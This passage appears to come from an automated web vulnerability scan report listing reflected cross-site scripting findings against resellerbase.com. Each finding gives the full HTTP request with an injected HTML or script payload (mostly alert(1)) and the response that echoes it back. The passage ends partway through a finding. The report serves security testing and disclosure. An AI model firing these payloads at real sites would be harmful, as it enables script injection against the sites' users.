HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:35:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=7e6b57\"><img src=a onerror=alert(1)>b0d61f4a1dbc55ff4">
...[SNIP]...

2.314. http://www.resellerbase.com/adult/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 415cc"><a>bbb6aa4c421 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /adult/search.php?cat=7&keyword=search...415cc"><a>bbb6aa4c421&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:35:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php?cat=7&keyword=search...415cc"><a>bbb6aa4c421&Submit3=Search&opt=1/more2.html" style="color: ">
...[SNIP]...

2.315. http://www.resellerbase.com/adult/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 8b84b<a>9f3115828c9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/search.php?keyword=search...8b84b<a>9f3115828c9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/search.php?keyword=search...8b84b<a>9f3115828c9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.316. http://www.resellerbase.com/adult/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59296"><a>a86b285e78f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%/59296"><a>a86b285e78f252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:40:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%/59296"><a>a86b285e78f252f/more2.html" style="color: ">
...[SNIP]...

2.317. http://www.resellerbase.com/adult/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83cdf"><script>alert(1)</script>1e72c6ba119a50e6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/search.php?cat=7&keyword=search...&Submit3=Search&/83cdf"><script>alert(1)</script>1e72c6ba119a50e6fopt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:40:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php?cat=7&keyword=search...&Submit3=Search&/83cdf"><script>alert(1)</script>1e72c6ba119a50e6fopt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.318. http://www.resellerbase.com/adult/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a9445<script>alert(1)</script>a05532bc6cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/search.php?a9445<script>alert(1)</script>a05532bc6cf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/search.php?a9445<script>alert(1)</script>a05532bc6cf=1 was not found on this server.</p>
...[SNIP]...

2.319. http://www.resellerbase.com/adult/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload e31f6<a>dc87d1371cd was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/search.php?keyword=search...&Submit3=Search&opt=2e31f6<a>dc87d1371cd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/search.php?keyword=search...&Submit3=Search&opt=2e31f6<a>dc87d1371cd was not found on this server.</p>
...[SNIP]...

2.320. http://www.resellerbase.com/adult/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The value of the opt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 638db"><a>47f2e19115c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1638db"><a>47f2e19115c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:37:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1638db"><a>47f2e19115c/more2.html" style="color: ">
...[SNIP]...

2.321. http://www.resellerbase.com/adult/search.php [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The value of the select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e012e"><a>ec6a430b532 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fe012e"><a>ec6a430b532 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:38:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fe012e"><a>ec6a430b532/more2.html" style="color: ">
...[SNIP]...

2.322. http://www.resellerbase.com/adult/search.php [select parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The value of the select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e3f3"><script>alert(1)</script>f967a08cd9a was submitted in the select parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f3e3f3"><script>alert(1)</script>f967a08cd9a&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:38:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f3e3f3"><script>alert(1)</script>f967a08cd9a&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f/more2.html" style="color: ">
...[SNIP]...

2.323. http://www.resellerbase.com/adult/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9c90<script>alert(1)</script>964ad275719 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultc9c90<script>alert(1)</script>964ad275719/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultc9c90<script>alert(1)</script>964ad275719/themes/ was not found on this server.</p>
...[SNIP]...

2.324. http://www.resellerbase.com/adult/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6349f<script>alert(1)</script>1036de8c877 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes6349f<script>alert(1)</script>1036de8c877/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes6349f<script>alert(1)</script>1036de8c877/ was not found on this server.</p>
...[SNIP]...

2.325. http://www.resellerbase.com/adult/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fdedd<script>alert(1)</script>86719abc024 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/?fdedd<script>alert(1)</script>86719abc024=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/?fdedd<script>alert(1)</script>86719abc024=1 was not found on this server.</p>
...[SNIP]...

2.326. http://www.resellerbase.com/adult/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 648c9<script>alert(1)</script>2d7d06ebf68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult648c9<script>alert(1)</script>2d7d06ebf68/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult648c9<script>alert(1)</script>2d7d06ebf68/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.327. http://www.resellerbase.com/adult/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 20257<script>alert(1)</script>359856fe6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes20257<script>alert(1)</script>359856fe6/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes20257<script>alert(1)</script>359856fe6/kosmos/ was not found on this server.</p>
...[SNIP]...

2.328. http://www.resellerbase.com/adult/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ea1f4<script>alert(1)</script>fdca2fbe716 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmosea1f4<script>alert(1)</script>fdca2fbe716/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmosea1f4<script>alert(1)</script>fdca2fbe716/ was not found on this server.</p>
...[SNIP]...

2.329. http://www.resellerbase.com/adult/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a1dbf<script>alert(1)</script>f06fb74cffd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/?a1dbf<script>alert(1)</script>f06fb74cffd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/?a1dbf<script>alert(1)</script>f06fb74cffd=1 was not found on this server.</p>
...[SNIP]...

2.330. http://www.resellerbase.com/adult/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bc223<script>alert(1)</script>da7cc576b3d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultbc223<script>alert(1)</script>da7cc576b3d/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultbc223<script>alert(1)</script>da7cc576b3d/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.331. http://www.resellerbase.com/adult/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa4c2<script>alert(1)</script>599bd658ae6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themesfa4c2<script>alert(1)</script>599bd658ae6/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

